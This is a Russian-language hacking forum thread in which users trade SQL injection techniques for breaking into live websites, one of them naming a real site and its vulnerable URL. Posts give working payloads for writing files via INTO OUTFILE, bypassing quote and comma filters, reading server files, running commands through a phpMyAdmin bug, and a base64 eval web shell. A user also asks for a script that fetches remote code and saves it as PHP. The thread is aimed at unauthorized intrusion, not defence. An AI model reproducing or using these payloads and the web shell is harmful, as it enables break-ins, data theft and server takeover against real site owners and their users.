пробовал 1+or+1=(/*!SELECT*/+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- PHP: Microsoft OLE DB Provider for SQL Server error '80040e14' Incorrect syntax near the keyword 'TOP'. /adredirect.asp, line 23
собсно вот сам ресурс: PHP: http://www.stockhouse.com/adredirect.asp?sid=7385+or+1=(SELselectECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- на без топ ругается на table_name
Как в sipt Cookies добавить?добовляю в additional headers Cookie : PHPSESSID=3d896ce0ca05137e1ffa4f58893706e8 и вроде не работает так
Проблема с заливкой, сколько пытаюсь нечего не помогает, в интернете статей по поводу этого нету, везде одно и тоже.. или outfile или dumpfile а если фильтруются ковычки что делать не кто не говорит =( Читать файлы могу с помощью LOAD_FILE но -587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+into+outfile+'/home/data/www/2323.php'+from+mysql.user-- не пашет, так как фильтрует кавычки, дамп файл тоже не пашет, кодировки в чар, хекс и тд и тп тоже не помагают, второй подзапрос с обходом магик_куотс не прокатывает =( что еще можно применить ? (мозг и руки уже имеются)
Читать файлы могу с помощью LOAD_FILE, FILE_PRIV есть. Ошибки сервера выложить не могу, так как их нету (в смысле на экране))
Надеюсь найдутся добрые люди которые хотя бы шипнут про способ) пы.сы. И если есть пхп программеры, может у кого найдется скрипт который при выполнении скачает txt файл с внешки и переименует его в php (Это не для скули)
А ты на 100% уверен что у тебя путь до дериктории правельный?? Если нет ошибок на страничке, тогда как ты узнал путь? и ести у тебя есть доступ к mysql, то ищи phpmyadmin, или пробуй на удаленный доступ!
На 100% уверен что путь правельный, доступ к серверу так же имею с помощью бага phpmyadmin PHP: $output = `ls -la /home/data/www`; print "<pre>$output</pre>"; exit; Но увы я под юзверем apache и создавать, именять, архивировать, редактировать, удалять и тд и тп не имею права, вообщем ограничен до хрен знает чего. Щя еще попробую скачать с внешки с помощью скрипта. Полного доступа к mysql у меня нету, только скуля, логин и пароль админа среди 900к+ юзверев искать (если учесть что там все ид номера в разброс и все не попорядку, так еще и через лимит, так как group_concat выводит не все) просто бред, а автоматизированного способа я не знаю =( + ко всему этому все конфигурационные файлы 667, т.е. читать с помощью скули или команды cat я не могу. Я очень давно всем этим не занимался, вот пришлось вспомнить
Ребята, помогите, очень нужна помощь. Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример: index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+ или как-то через скобки? Уже столько вариантов перепробовал, и не знаю что делать.
CTAPu4OK поиск доступных файлов/папок для записи: find /home/data/www -perm -2 -ls доступ к /tmp/bla.php есть практически всегда если у тебя есть возможность выполнять php код на сервере то с кавычками можно бороться так: <?eval(base64_decode($_GET[shell]));?>
тогда так: index.php?id=-999+union+select+1/*!,*/2/*!,*/3-- можно и так если версия mysql 5 index.php?id=-999+union+select+1/*!12345,*/2/*!12345,*/3-- 4 версия index.php?id=-999+union+select+1/*!1234,*/2/*!1234,*/3-- etc...
Папки все доступны для записи, но права ограничены что даже скопировать не могу =( php коды могу выполнять, но тоже ограниченные и после каждого кода идет exit; т.е. использовать код можно только один раз и в дальнейшем его нельзя использовать) т.е. Сам експлойт на одном сервере, txt файл с исполняющимися коммандами на другом сервере, а пхп май админ на другом)
